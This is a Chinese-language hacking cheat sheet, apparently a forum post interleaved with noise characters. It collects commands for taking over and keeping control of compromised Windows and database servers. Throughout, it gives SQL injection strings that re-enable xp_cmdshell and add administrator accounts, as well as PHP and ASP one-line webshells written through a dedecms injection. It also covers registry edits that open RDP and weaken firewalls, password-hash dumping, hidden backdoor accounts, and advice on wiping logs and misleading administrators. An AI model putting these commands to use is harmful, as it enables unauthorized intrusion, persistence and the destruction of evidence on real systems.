' s1 e: F$ J I6 Y* ~8 k7 U
1.net user administrator /passwordreq:no
* [% o" R: F3 y3 o, Z& Q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了6 C# A2 t6 {. }0 k7 x5 F9 ?
2.比较巧妙的建克隆号的步骤% L6 B% g+ X; b, T* n* V. b5 L
先建一个user的用户
0 m |4 m+ F6 A2 c) T$ A然后导出注册表。然后在计算机管理里删掉
# e& j# `- D9 G. w) N3 ]* b& Q& @! d" R在导入,在添加为管理员组
2 q4 T3 D' O8 I) z8 V8 q3.查radmin密码
c! g3 G1 a! M( x$ M* L9 R" lreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
- l4 E) K, K5 [2 H) }4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]2 v7 N4 \3 }7 n9 P6 V
建立一个"services.exe"的项
9 w! l6 b) M0 g9 f9 D再在其下面建立(字符串值)0 \0 A0 P& Q& ~+ O; S% q; I7 y
键值为mu ma的全路径
; S! c3 ?4 ~: Q# h4 O, A. X5.runas /user:guest cmd
8 a: b$ x3 J! e测试用户权限!
$ i& z/ d1 r+ j: L6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
% W6 @6 V7 ]8 s R' v7.入侵后漏洞修补、痕迹清理,后门置放:
) G) D: U1 A- }$ |% m7 ]- Z; o+ D基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门7 N ~; s: e" ~% d
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
I. N0 l" b0 w ^7 Z& A
% M$ |8 R7 S3 d% Yfor example
' J; [5 H8 d, F2 k1 x2 T5 O0 c+ Q$ h7 f: u
1 T0 V h# t0 @/ H3 @, ?declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
+ Z" p7 H. W G g+ s
; D8 O1 A: r) A* {# ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'5 c4 S& ^ B- ?; i
3 j* b, T6 e0 p0 _9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
) r& I, g. h( y( B ^如果要启用的话就必须把他加到高级用户模式
# { `. Z: B m! T! I* i0 R" |可以直接在注入点那里直接注入/ S- M. V' T4 `9 _+ F8 a
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
' |8 a5 F; K/ b/ F* z' {8 P- d ^然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--* [4 u0 ?+ `" q; p
或者
4 G$ e& {5 o `" b( t( K( psp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
: a9 p" k1 h. G0 w# G来恢复cmdshell。
- O0 |' D1 Q9 @: N/ S3 F- I: k3 B) N8 H4 d
分析器4 j( E; J7 `* s! ]& R
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
. l7 Q9 k m* [然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
7 G8 M7 w, u5 |9 r10.xp_cmdshell新的恢复办法: `* V, B& ]6 C5 J; M. U9 j
xp_cmdshell新的恢复办法
' m3 L2 ], M6 r. m" g0 A+ [8 i y$ |扩展储存过程被删除以后可以有很简单的办法恢复:: G. \8 b0 k2 O$ y
删除, [2 F0 u" b* I( l5 n+ {6 J: A
drop procedure sp_addextendedproc( O% t) h) S& D; |$ ^; L4 W
drop procedure sp_oacreate
' s3 Z5 r* u* d- z( Y; r; [& S/ pexec sp_dropextendedproc 'xp_cmdshell'( Y* c2 q' h5 b" }) `: W
3 e; o( \+ A5 e* Q2 @9 N6 e
恢复+ q3 N4 a; g5 i1 c: X. X
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
/ @* C# j# ?' gdbcc addextendedproc ("xp_cmdshell","xplog70.dll")
. U2 T: l9 i( |% H9 U+ f4 ]
; z0 Q* s8 v4 v, r: Z( p a这样可以直接恢复,不用去管sp_addextendedproc是不是存在# O& @. Z- e/ S
% B; ?4 Z, N% h; I9 i7 z2 a
-----------------------------
: | }# c2 E. g& |0 m, y
+ Z1 k, [% k+ p) g! a删除扩展存储过过程xp_cmdshell的语句:
& M/ P7 \4 J3 j' |3 J. P- Nexec sp_dropextendedproc 'xp_cmdshell'1 i) G4 c, h' O1 f. C
4 I6 i: }( R6 P6 Y- N
恢复cmdshell的sql语句6 r, J) X" w0 A- _" Q6 u; f/ B
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll') |# j, R# |9 r) N" J$ R! v2 c' e4 N! D
! T q$ o" n) C' U
! [$ l, v7 @+ X6 a: {7 D$ c1 S开启cmdshell的sql语句
1 @8 t6 b; w( s* u; j; w" _. o" a# y
: }, G2 y4 Y8 O# E5 b& l3 g" _4 rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 t- c4 q; b5 v. [6 @9 d8 I& V
% \# A. T+ |2 J% [2 A" O0 P% \
判断存储扩展是否存在
1 k: [6 \* m) |$ @& u7 R: Kselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
* R8 V! O' U9 D9 W' Z返回结果为1就ok
+ i2 A- k4 S7 T9 H" z% F+ z3 f
恢复xp_cmdshell, J3 v5 Z$ |5 S: r6 y2 l
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
2 V0 j0 i2 J& x- Q1 h/ S" z4 K4 `返回结果为1就ok
& h" F; D$ F7 \; K7 \' r+ M% y
' F' z+ J9 F, z. Y否则上传xplog7.0.dll
" g% P u& w4 ~exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'2 @# }7 w' q4 ?7 f, B+ d* Z) u
* _+ m% r3 ?9 K1 N2 w6 C堵上cmdshell的sql语句
# @9 n# m/ ^9 V! S7 `, w3 Psp_dropextendedproc "xp_cmdshel
# V# @0 E0 V0 W2 U* |-------------------------
4 S7 a) i, ^# U清除3389的登录记录用一条系统自带的命令:' D* f5 f! k1 _' c
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f' F. D' o4 a. w* \3 y ^6 t
9 R5 N5 u, F$ E/ c, u% a
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件4 C, _8 w" m" h. ?# w; c
在 mysql里查看当前用户的权限
2 w2 ^/ P; f( T/ Y+ `" X$ }show grants for
, s; @: F( ~! z* p5 S3 q$ ]# Z) e6 p: J
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
/ Q" S2 r1 j1 ^' k/ L! ^: W
$ J; \1 g7 ?5 J( ?- N7 K
$ ]6 P; b! Q! uCreate USER 'itpro'@'%' IDENTIFIED BY '123';1 L& x( t4 |9 _! `
: Q& h- ]! v4 v3 k
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION+ V' C: j$ `4 l4 q) k. F! l
3 p& F' a; R$ x/ m" Y) [7 j8 ?9 E
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
$ s9 W1 ]8 W! b
; e+ v( N6 c$ n# V: u; A, ?MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# ^6 k$ W3 q4 C4 S4 D; _
: I+ \. j/ g7 E! G% P; g1 U: L搞完事记得删除脚印哟。: f: J/ [, {8 }- @+ M: J& E
5 E/ K' U( n, ?6 Z! B
Drop USER 'itpro'@'%';- k) s$ P2 w. \$ Z2 l" g6 X, J6 |
; g, n% n( d) ^5 m
Drop DATABASE IF EXISTS `itpro` ;
- u0 J/ ]& ?$ x" K& w3 O" e# Z9 @9 @" E) G! y
当前用户获取system权限
2 q5 m+ t$ V+ L# X+ b ? Vsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
9 u3 n" i5 ] W7 j, N# d6 \6 A" Asc start SuperCMD% g8 d1 q8 k# s
程序代码
' t" q& w' F& \# S+ Y<SCRIPT LANGUAGE="VBScript">7 P" y$ R q- Q7 c" L/ D+ ]
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
8 f8 G2 t7 | y4 W! Ros="WinNT://"&wsnetwork.ComputerName
; ]& Q h' B9 u6 W: _# ]Set ob=GetObject(os)# K; r! d6 ]* V3 H, z
Set oe=GetObject(os&"/Administrators,group")
8 m X( O5 K" @4 Z5 z8 Z0 _Set od=ob.Create("user","nosec")
2 s: y( U) k b3 Z3 I6 c( D( Tod.SetPassword "123456abc!@#"
1 A3 F( |9 u' v2 ?2 T" E! Uod.SetInfo! I. l, ~, Q# t+ J: B0 A
Set of=GetObject(os&"/nosec",user)4 @ Z- l! B6 `
oe.add os&"/nosec"
' H t1 s) x) R- h, N/ b P</Script>9 ]% ~3 ~, ?1 E$ w) S# r) g
<script language=javascript>window.close();</script>
) K& C) H4 Q9 k l3 O- B8 L1 O+ y7 j% @/ d. @/ F0 l
a* C. K1 X6 @$ x4 w8 n3 ]3 E0 v" R+ a8 {
4 y1 ?6 ^3 C& Z/ ]突破验证码限制入后台拿shell8 g# j* k$ V5 C; E) S7 [
程序代码
* X- R! b6 d+ M4 f' l) _9 OREGEDIT4 4 m& V# O3 Z, x, q6 C
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ! L( o6 |, F/ M3 Y( W
"BlockXBM"=dword:00000000
9 ?' @) V: w) F# F7 c; r- w2 ~: G7 U4 S* Y/ ^
保存为code.reg,导入注册表,重器IE
! Y8 q( x1 I ?8 V a* O就可以了
" T0 ?4 r1 u+ J. a; B2 Q! qunion写马8 \& L2 z- t6 m1 t7 ?! t, W% [
程序代码( L& S$ V8 X& A) Q- R* ]
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
3 [1 I" e4 o2 T9 U* U! {1 X9 m8 i' H9 A; X
应用在dedecms注射漏洞上,无后台写马. y d* E7 t6 g" p2 @& E% l
dedecms后台,无文件管理器,没有outfile权限的时候/ R# ?/ C: b9 h. m( k/ a
在插件管理-病毒扫描里' M" s" P2 U: Q0 |4 q# H* |, n/ t! i
写一句话进include/config_hand.php里 U) ?- @) X! |- ^# H5 ~
程序代码; i" B1 k0 t9 _# m
>';?><?php @eval($_POST[cmd]);?>
/ P& s7 c6 ~3 m$ [5 {; {" p: C1 F+ a" z: F
, V$ y. t5 X# A$ F5 i1 E; V) A: k1 Q
如上格式0 @6 Q; C, A8 x2 x" t3 D
" m# y- M& W$ o k" W5 L& W; loracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解2 f- Q1 [- K, N5 V. j
程序代码
+ z1 R3 W* e9 [2 n' T: m1 Vselect username,password from dba_users;* {6 d8 {; C/ Q% |- k: Q
: M$ N2 `5 S! b0 o
$ E7 L! N- ^. x' |( m8 @4 |
mysql远程连接用户
( `& ~# n X4 ^1 M! Q程序代码$ n/ G/ V9 s6 E' j9 i
A& R) w7 {) s {Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
/ Z U+ U1 A9 W; S% iGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION1 ~5 \) M3 D' e: m6 C# m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0* B5 }" ^7 d6 |$ }; F! R
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# s9 G/ p" P. }% T9 ?, S* [! p
, z. E+ {; N5 Z. D% Q
$ \* t5 L, r0 @' G2 d. G( c8 a: p' c" ]+ M* b
% A! J; J) S. R4 V1 |* ^; ~
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
! ] O: H# x) Q ~" K) _+ o
3 V0 B4 t. r9 w$ `, m2 @1.查询终端端口
$ h0 p; b* ]2 \' N1 V# }8 J4 |2 U: ^, I9 A! l* r% }& h
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
/ A: d! L" v& U0 V# l2 |8 M& a$ v4 |7 y8 Z* _4 g; ^
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"3 r8 ]9 d* u1 A
type tsp.reg$ P' `% p- X, G: N u0 P
7 ?6 r1 ^ t' y) H8 W! B$ i( X
2.开启XP&2003终端服务
* w6 |6 R% K2 f
$ m7 V$ n% V$ S
5 u6 ~/ u; z6 N+ M, Z8 G' O7 wREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
~ b/ s2 H' ]; S# d; B% i9 {2 q$ \) d8 G6 z6 f, W
5 h" l$ @# o, q$ m1 [% `' M/ |4 \REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f0 O* f0 M# e3 o: }8 h
* [0 A1 W- _ a' L" j$ R
3.更改终端端口为20008(0x4E28)3 ]. I* L+ z+ l
4 P" l- F4 w" U- xREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f3 W R. C; u1 F% d' {
0 y9 P9 y3 p- gREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f8 Q6 X6 x" Y* B8 w+ d
- f! h- b- A4 N2 I' z4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制( \8 Y% \* u) \* K" t. {
0 y' H0 h8 H2 v0 c ]$ h6 a- gREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
: m4 m! g# x) |* Y$ P- m& E9 q6 h0 {( A. a
7 m) K9 K# @* U5 [0 R- f5.开启Win2000的终端,端口为3389(需重启)6 k2 [" [9 x8 @4 L) E5 E
; B) |" \5 d( |# M. Q5 Cecho Windows Registry Editor Version 5.00 >2000.reg ! }1 i; n, ^. q* B$ k
echo. >>2000.reg
+ d* T( W: _7 Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
o; H3 `2 \3 h) B1 Xecho "Enabled"="0" >>2000.reg 7 |' y& P2 S! v, C1 }4 X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
# [8 D& T3 A l6 Y9 iecho "ShutdownWithoutLogon"="0" >>2000.reg
6 D5 D ^- q& y) ^ y. hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
. u9 v$ s1 J! X" K4 F) l& Secho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
0 z/ a# a& C6 V" u( b, Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
% j& J& e; t3 H. {echo "TSEnabled"=dword:00000001 >>2000.reg 3 Q' p1 ~/ e+ n; n' y e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg % y& ]) t! k4 @ K4 W0 v6 [
echo "Start"=dword:00000002 >>2000.reg
7 j7 m4 {) a: W; E4 gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
) v6 z2 Y* {" ?5 uecho "Start"=dword:00000002 >>2000.reg + a% @/ O: w5 I8 W1 [
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
2 E" S- [5 q( J% A- Lecho "Hotkey"="1" >>2000.reg
' Z, F! B9 B" X" k6 {+ O( secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
* j8 g* [- m9 A* z4 t6 Wecho "ortNumber"=dword:00000D3D >>2000.reg
! s/ H% P* D0 [- D3 V& z3 {& N' {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
' Q* Y- T1 _% |$ t1 xecho "ortNumber"=dword:00000D3D >>2000.reg
. F# U$ q Y! e) G; d2 k. A
# i! b: b! F. w7 l9 |6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启) H5 x1 O/ o9 [) E4 t; _
# B/ G1 o; G; w, q9 ? @& w
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf) c- W8 p* @% B4 u1 `9 S! g) R
(set inf=InstallHinfSection DefaultInstall)
% l1 C8 n2 w0 ?1 d! [7 Zecho signature=$chicago$ >> restart.inf
5 e7 W E6 u! |: C( Gecho [defaultinstall] >> restart.inf5 m* j! a8 g- g3 W' R$ }
rundll32 setupapi,%inf% 1 %temp%\restart.inf
4 E3 @5 p7 C7 S* i/ s6 ]. Y9 `6 \+ \( O7 m# ~: ~% T
( l3 N3 d% m7 n: y7.禁用TCP/IP端口筛选 (需重启)
3 [+ A, Q5 N. U9 D# J# A$ v
X2 ?. x; k2 ?$ sREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f: n- I5 J d7 B3 P3 i) `$ X
4 p2 S8 X8 E* \- e9 h
8.终端超出最大连接数时可用下面的命令来连接5 Z4 {5 Y. E% E* o" d9 d2 d
5 X, z; W, ~- m# o$ Q/ _5 {
mstsc /v:ip:3389 /console4 T; ~: P/ E' V$ j8 r
. f! `! }6 ~5 v% ], [" D8 K4 j% [! L7 \9.调整NTFS分区权限! s( ]" V& v3 n$ ]
) Y2 [% h5 M# n0 Ycacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
, d7 ^! L/ a+ T5 H7 o+ n- I! |. g( V- z
. ?; r. G e! i% Ucacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
2 W4 M! e6 [" C0 V
3 } V8 r, i' N( B------------------------------------------------------
/ D N {4 q* c$ f3389.vbs
* q7 S# I+ f A0 C6 e6 NOn Error Resume Next
" Z4 s) V9 T6 M* ~7 U( [: u; Z5 Fconst HKEY_LOCAL_MACHINE = &H80000002
" {/ C3 F# u+ J! q* a' _! ?strComputer = "."5 b, ]' }# S( V- g4 i( g
Set StdOut = WScript.StdOut$ Y, Z! S' [$ c% q- s! W4 ~( Q4 `6 d
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_- d4 x2 ^6 W( y0 x9 l
strComputer & "\root\default:StdRegProv")# @$ r: [6 p* Q: X0 x' j
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 y. c) E, X7 |
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath! C- {/ Z0 k& A0 L4 I' q: ~2 f
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
3 X5 B1 _% B0 }$ k+ c/ @oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
5 I1 X9 F* P, P1 xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
% n4 i+ c- j7 M0 F, V0 [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"1 C* q1 O5 x3 L& p! o( u; ?
strValueName = "fDenyTSConnections"2 j/ e# g- f: U/ S9 j4 \
dwValue = 0+ [1 l7 R) u! o. Q
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
0 r9 S( t; k2 X8 i/ }strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", `& k( _3 s7 w9 k, S5 r' @
strValueName = "ortNumber"
}( A& B h8 z& E. Q, A' A" mdwValue = 33899 j& ]' D" ~4 Q* i* Y
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 f. H) e3 Q! O: J* O3 Y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ }& W7 J9 x: `0 @
strValueName = "ortNumber"
, y6 m% q; B8 m1 Z; Z$ t+ M2 I7 [( c+ {4 GdwValue = 3389- I/ u5 A0 ^) F# i) B$ M' u
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. P/ l% E7 m) x" l. k6 H9 rSet R = CreateObject("WScript.Shell") ( j1 Z5 E! q: D! `' J
R.run("Shutdown.exe -f -r -t 0") 4 h' q, |7 @* y- m+ _- R/ W
8 B F1 \$ L" F8 Q4 G4 |; ]删除awgina.dll的注册表键值
; o3 |& ?* H7 B% g程序代码
& R! }: j% {* M+ [
- ]2 ~7 I; M% |1 p5 J5 N$ h2 @reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f/ ~" ] S; }9 r8 n. J
& X1 `2 W+ J% }
8 ?$ |' V5 o5 C0 V* I) v) G6 n! S: W. I0 x4 Q! V
9 G" v7 U8 e0 T# J
程序代码" i3 C* R2 q) n! M: P- L
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
2 T8 m* N M) f# ^! V( G
R! H7 k/ o% G5 d0 F3 g设置为1,关闭LM Hash9 t8 A4 w' N, T1 l4 |
* S6 ^' G, N$ u. b& W9 j数据库安全:入侵Oracle数据库常用操作命令
5 Y0 m, R& i0 x. Z% z最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。/ b w9 {: z/ F4 V
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。% S/ P8 o" X3 t
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;" [4 j7 O- d* a. [& v
3、SQL>connect / as sysdba ;(as sysoper)或, B! u+ ^3 r+ Z) i1 L* Q
connect internal/oracle AS SYSDBA ;(scott/tiger)% e7 {# L1 \( g' d5 P9 Q
conn sys/change_on_install as sysdba;. P+ Q( t* d* H& G
4、SQL>startup; 启动数据库实例
- h! z- c, C) e+ Q5、查看当前的所有数据库: select * from v$database;" G$ J* y# g7 A6 t" \6 D
select name from v$database;
: H8 F; E- @+ C( O4 z1 b6、desc v$databases; 查看数据库结构字段
: {8 i5 \: Z" h7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:; W1 Q# X/ }4 V) V/ x
SQL>select * from V_$PWFILE_USERS;
# q+ f. ]: n A' D; |! J4 `Show user;查看当前数据库连接用户. \# ~0 C% e' e' I
8、进入test数据库:database test;, k9 F0 ?6 L/ B" Z2 ] @( ~
9、查看所有的数据库实例:select * from v$instance;
, R8 O; g/ ?) `如:ora9i7 t8 f7 |+ M% I. ?: a ?
10、查看当前库的所有数据表:
# i4 }2 c, G1 pSQL> select TABLE_NAME from all_tables;
8 l$ j' R% J5 v1 _% f( j% ]/ Hselect * from all_tables;
0 N6 @5 t' O) `SQL> select table_name from all_tables where table_name like '%u%';
$ F4 E+ a$ i' QTABLE_NAME
3 u+ ^3 u$ E+ Y$ ~' M------------------------------
2 X5 X' W, I# b! p% i_default_auditing_options_
) x9 f$ c! J- Y11、查看表结构:desc all_tables;
/ f) N$ \; E% ]3 T& c4 i12、显示CQI.T_BBS_XUSER的所有字段结构:
+ q- w7 z- T; Sdesc CQI.T_BBS_XUSER;2 J5 k+ U' X; I/ I3 @* T* e/ l- U) u8 p
13、获得CQI.T_BBS_XUSER表中的记录:
8 \6 u: M, \# G7 F4 Oselect * from CQI.T_BBS_XUSER;! ^3 [1 e" ?0 v
14、增加数据库用户:(test11/test)
0 \4 c7 h0 L7 n5 lcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
# R3 |7 [3 ]! K3 ^* A15、用户授权:
; `& ` n" l( Sgrant connect,resource,dba to test11;
7 L& D6 f: \/ f- b& Cgrant sysdba to test11;
; l& k1 I" D9 j: \! Rcommit;
; k, h; }* ?- O8 |( G16、更改数据库用户的密码:(将sys与system的密码改为test.) G+ [" g ^9 ^* ^
alter user sys indentified by test;1 p& P- B5 ]- s9 c: J+ @( Z
alter user system indentified by test;& k) t% t3 V- S
) ^6 q; B: A, m! o, L* happlicationContext-util.xml
" ]$ Y* C% ?2 f/ i9 BapplicationContext.xml
7 D! [1 i1 y' |" ^" r$ m* Lstruts-config.xml6 F7 G& _+ U$ H; S) T1 V/ U
web.xml- G/ P3 j6 T+ O
server.xml* z2 Z/ h+ M' B+ H
tomcat-users.xml
" ?- k3 d$ m! ^% v2 Q' t& W$ Bhibernate.cfg.xml
! h% l3 f+ @% s) h3 idatabase_pool_config.xml6 w* Q W# Z$ c: c
$ T; B: y8 q! i, |. i! R# F1 c
0 e( U, u; y; D6 F: K\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
: y6 `% q- D+ N\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini* i0 R# C1 [( Z5 C
\WEB-INF\struts-config.xml 文件目录结构* a$ A8 R5 W( S: f0 Y7 x H
8 b% s: i& l5 _; A% Z9 b% y; Hspring.properties 里边包含hibernate.cfg.xml的名称# f* }- I6 ?- D4 a4 J Z2 m: G K
; ~8 |0 v( r/ Y! U$ R: B# x# C
8 f! E6 s0 D g) K
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml% @8 X' _- ?2 ^
1 G8 M- {" F% |如果都找不到 那就看看class文件吧。。8 e+ p- V3 f) _3 }, K
8 V i/ `2 @( m" Z测试1:6 N4 A8 q3 m( g7 S
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1, j; p7 o% x2 f8 Q( Q* [
7 O5 K) P/ ]; \8 R7 d$ e
测试2:
# G* N7 x' t; }, P" V* Y r* A9 Y0 i9 {# n/ y+ M2 |. x
create table dirs(paths varchar(100),paths1 varchar(100), id int)6 o3 w$ m b1 f* C, G8 L
4 L6 i* ]# \3 G( b1 Z/ X
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--9 i, x9 T8 t! S- E# K
0 K% w' p. {* O; c+ D7 |
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
) I6 w9 ?# Q! L% c. A" R3 H
) D, q1 L6 M) W8 g( k3 E查看虚拟机中的共享文件:
. {2 q' u! i# K/ k* }9 M. X2 [在虚拟机中的cmd中执行
6 g4 Z. R: }% e\\.host\Shared Folders. R: K- ^3 l& @2 t6 M5 v$ `
: ^& p3 q, ^/ i% V4 t' x! S
cmdshell下找终端的技巧
) G$ V; u6 A7 ~0 D找终端:
, i. O3 j1 Z" ^: D; o8 M, C8 I3 ?第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
' l0 O E9 t! P6 N 而终端所对应的服务名为:TermService 0 _/ `3 B1 ]" ~# ?, p% k
第二步:用netstat -ano命令,列出所有端口对应的PID值!
& |: e* x7 L. M9 @ 找到PID值所对应的端口1 f+ b# C' b* ~! R* } A
! z8 D9 u; E3 q+ z7 c9 M" J1 N. @, q
查询sql server 2005中的密码hash+ X! i- T. |5 S. @
SELECT password_hash FROM sys.sql_logins where name='sa'
* _7 h# r0 l$ G( C, b, kSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a- M( Z. c. N+ f
access中导出shell
0 j9 [/ V! y2 J0 k4 D, X
5 {0 I4 [6 n; v* g2 f( G: ^( \中文版本操作系统中针对mysql添加用户完整代码:. q" t; ]5 a" N4 a' F. C2 M
